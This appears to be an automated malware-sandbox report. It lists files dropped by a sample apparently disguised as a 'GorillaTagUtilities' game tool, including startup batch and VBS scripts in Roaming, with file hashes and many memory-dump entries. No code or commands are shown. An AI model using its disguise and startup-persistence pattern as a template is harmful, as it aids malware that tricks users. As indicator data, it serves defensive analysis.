5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
051a74485331f9d9f5014e58ec71566c

SHA1
4ed0256a84f2e95609a0b4d5c249bca624db8fe4

SHA256
3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888

SHA512
1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cb9070f7a07a5d3fc17121852bff6953

SHA1
1932f99c2039a98cf0d65bca0f882dde0686fc11

SHA256
6c908b4ca5b098e166b48a0e821050db43fba7299a6553be2303bee5b89545ac

SHA512
97b9fc5ce40b102e2c9334500f6c17625c982ff8e4afaaabd92c2468cd8deface01d7cdfd267c4f10aac123b7a6173fde85d2b531c6f134a3896a8ca5edfe1f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
71f5efa1b29787914ccfcf1d653837e4

SHA1
385a0892525346c56c5952b04321241fa4446492

SHA256
d17376a2ad4b5d77eb2aa8e8a95d3a3d281b7be9e07874bc9588f290c42544c9

SHA512
ab1c864d79f7ce9aa05ba66e482341f71a32da90456778d328c57728164ca2799d6fd50ce3c659e51fb69e5c3f835784bf53166b819ea7b97f6406af0306689c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f4a7be133e41437aea4e606c265ed0af

SHA1
7e803076c19d771c3703bf8e6e80ca7395aea497

SHA256
c220b93bf62845a27070a19282315a59856bfb70a4aad2f7ed14ba263ad615c9

SHA512
e32922b3e30b78b2bbeece2f55e91efb809a24065675276615017942a047350cfd3c0ccee6ceed6889394eb3618824ad1c174beec7ac792db180af2f5cc36b6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.bat
Filesize
300KB

MD5
9b737397e1ec36cdbefaabfa9ed6d7b0

SHA1
a30c4a13b435a8242a6d6e1e9d7f96ee77b38a8e

SHA256
7841dbc3907dcae8378e078183c37b315f76b5ecd3b310e7b4fe174839b97abf

SHA512
717865678e03f07a38cdb83ec8fe83f370266a9f697c596262480786252b8afcec9bf1a9ccb213c2d5d3285e94755d1bbc6cf24c2df80a11293b357861ce4239

Download Submit
C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.exe
Filesize
47KB

MD5
d5511e6b8d49c09cd0d53065c7dab0e0

SHA1
8d9820c3c6f186cecc9798d074132085c1b9f9eb

SHA256
1b9a81a2fc7941367b1fe337c1cca18c6a45d577c212f82da3c69eae05698e49

SHA512
b5a332db858ca5cea7824534d751b8e9af386e7c5602d4b07261ca990eec0668112975479c722408a228ed32e54a1adf14b107ebf49fe9c940cedbb6ae803169

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fmovlihp.pgb.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_479.bat
Filesize
557KB

MD5
c88576f629b0a738df2ed3238ab890c6

SHA1
158b12ab42db9a32b2570080e2fda2f4742486df

SHA256
fd9af97638b947c8c1142bc54efa2668a8b65ccdfdbc2c08ff4d338bfa55620f

SHA512
c090ad0c9a3734419b130311e5a812300e9c3e66e7fe2cc4c2d27e257874b6854f754e563ceff68ff6497628e4dcc42d8cb31a106609ff2b8a581f0bbb7bfe5a

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_479.vbs
Filesize
115B

MD5
2945c6e51ed4a19ec08d765f909c6738

SHA1
e4544188d5c1b4fac3c5a16e3fa6fe0bf621e688

SHA256
b7c487af3a804a4e21b66d9a7d1a5f2ea7bc9b3bcb1b92f0b4e66da7afc8262c

SHA512
6cf14612802392229f85532d9911aa1f75ee80e623daa77ce770a2a6075d509c1c4ea169b91fa155c1fe0662426a598362101b06a4c64958fcb3b7629ba41e23

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_923.vbs
Filesize
115B

MD5
8e4adbf152361539e19c69862a93ff8d

SHA1
7f69dab4242546156aba9c5be14064068113fc55

SHA256
0a773b5f02f4bfb92748278e1c0e48b5672ff703aaa985e63b0856ef28bc2faa

SHA512
f70e076e47d52056de252f4b2f09adc8cf79f19e852f10cf6e492e7384e04cd1c58c29fbbac0e49777c63882d1776e5f86b85f939b5057b11fcc6d0f73353ca2

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/384-90-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/384-88-0x0000015A725E0000-0x0000015A725F0000-memory.dmp

Filesize
64KB

Download
memory/384-86-0x0000015A725E0000-0x0000015A725F0000-memory.dmp

Filesize
64KB

Download
memory/384-85-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/1696-50-0x000001C4D9F50000-0x000001C4D9F60000-memory.dmp

Filesize
64KB

Download
memory/1696-126-0x000001C4D9F50000-0x000001C4D9F60000-memory.dmp

Filesize
64KB

Download
memory/1696-51-0x000001C4D9F50000-0x000001C4D9F60000-memory.dmp

Filesize
64KB

Download
memory/1696-54-0x000001C4DA210000-0x000001C4DA220000-memory.dmp

Filesize
64KB

Download
memory/1696-49-0x000001C4D9F50000-0x000001C4D9F60000-memory.dmp

Filesize
64KB

Download
memory/1696-47-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/1696-110-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/1696-125-0x000001C4D9F50000-0x000001C4D9F60000-memory.dmp

Filesize
64KB

Download
memory/1696-129-0x000001C4D9F50000-0x000001C4D9F60000-memory.dmp

Filesize
64KB

Download
memory/1776-72-0x0000014768810000-0x0000014768818000-memory.dmp

Filesize
32KB

Download
memory/1776-71-0x00000147686E0000-0x00000147686F0000-memory.dmp

Filesize
64KB

Download
memory/1776-69-0x00000147686E0000-0x00000147686F0000-memory.dmp

Filesize
64KB

Download
memory/1776-73-0x0000014768AC0000-0x0000014768B00000-memory.dmp

Filesize
256KB

Download
memory/1776-70-0x00000147686E0000-0x00000147686F0000-memory.dmp

Filesize
64KB

Download
memory/1776-68-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/1776-132-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/1776-133-0x00000147686E0000-0x00000147686F0000-memory.dmp

Filesize
64KB

Download
memory/1776-134-0x00000147686E0000-0x00000147686F0000-memory.dmp

Filesize
64KB

Download
memory/1776-148-0x00000147686E0000-0x00000147686F0000-memory.dmp

Filesize
64KB

Download
memory/2716-187-0x000001D325F10000-0x000001D325F20000-memory.dmp

Filesize
64KB

Download
memory/2716-186-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/2716-188-0x000001D325F10000-0x000001D325F20000-memory.dmp

Filesize
64KB

Download
memory/2740-174-0x0000018DBE140000-0x0000018DBE150000-memory.dmp

Filesize
64KB

Download
memory/2740-173-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/2740-175-0x0000018DBE140000-0x0000018DBE150000-memory.dmp

Filesize
64KB

Download
memory/2792-15-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/2792-17-0x00000249251B0000-0x00000249251C0000-memory.dmp

Filesize
64KB

Download
memory/2792-16-0x00000249251B0000-0x00000249251C0000-memory.dmp

Filesize
64KB

Download
memory/2792-26-0x00000249251B0000-0x00000249251C0000-memory.dmp

Filesize
64KB

Download
memory/2792-27-0x00000249251B0000-0x00000249251C0000-memory.dmp

Filesize
64KB

Download
memory/2792-30-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/3244-13-0x0000019FE0060000-0x0000019FE00E0000-memory.dmp

Filesize
512KB

Download
memory/3244-9-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/3244-11-0x0000019FDFCC0000-0x0000019FDFCD0000-memory.dmp

Filesize
64KB

Download
memory/3244-0-0x0000019FDFDD0000-0x0000019FDFDF2000-memory.dmp

Filesize
136KB

Download
memory/3244-10-0x0000019FDFCC0000-0x0000019FDFCD0000-memory.dmp

Filesize
64KB

Download
memory/3244-67-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/3244-76-0x0000019FDFCC0000-0x0000019FDFCD0000-memory.dmp

Filesize
64KB

Download
memory/3244-75-0x0000019FDFCC0000-0x0000019FDFCD0000-memory.dmp

Filesize
64KB

Download
memory/3244-87-0x0000019FDFCC0000-0x0000019FDFCD0000-memory.dmp

Filesize
64KB

Download
memory/3244-12-0x0000019FC7AD0000-0x0000019FC7AD8000-memory.dmp

Filesize
32KB

Download
memory/3380-158-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/3380-143-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/3380-144-0x0000019AA2DB0000-0x0000019AA2DC0000-memory.dmp

Filesize
64KB

Download
memory/3392-160-0x00000174B2640000-0x00000174B2650000-memory.dmp

Filesize
64KB

Download
memory/3392-147-0x00000174B2640000-0x00000174B2650000-memory.dmp

Filesize
64KB

Download
memory/3392-145-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/3392-146-0x00000174B2640000-0x00000174B2650000-memory.dmp

Filesize
64KB

Download
memory/3392-164-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/4108-163-0x000001F6508E0000-0x000001F6508F0000-memory.dmp

Filesize
64KB

Download
memory/4108-100-0x000001F6508E0000-0x000001F6508F0000-memory.dmp

Filesize
64KB

Download
memory/4108-98-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/4108-99-0x000001F6508E0000-0x000001F6508F0000-memory.dmp

Filesize
64KB

Download
memory/4108-177-0x000001F6508E0000-0x000001F6508F0000-memory.dmp

Filesize
64KB

Download
memory/4108-159-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/4108-111-0x000001F6508E0000-0x000001F6508F0000-memory.dmp

Filesize
64KB

Download
memory/4108-114-0x000001F668EB0000-0x000001F668EC2000-memory.dmp

Filesize
72KB

Download
memory/4528-128-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/4528-131-0x00007FFE4E2B0000-0x00007FFE4ED72000-memory.dmp

Filesize
10.8MB

Download
memory/4528-127-0x0000000000D60000-0x0000000000D72000-memory.dmp

Filesize
72KB

Download